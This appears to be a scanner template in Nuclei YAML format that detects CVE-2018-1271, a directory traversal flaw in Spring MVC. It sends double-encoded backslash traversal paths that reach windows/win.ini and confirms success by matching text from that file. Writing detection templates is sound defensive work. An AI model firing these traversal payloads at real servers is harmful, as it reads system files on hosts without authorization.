id: CVE-2018-1271

info:
  name: Spring MVC Directory Traversal Vulnerability
  author: hetroublemakr
  severity: High
  # reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d

requests:
  - method: GET
    path:
      - '{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
      - '{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'for 16-bit app support'
      - type: status
        status:
          - 200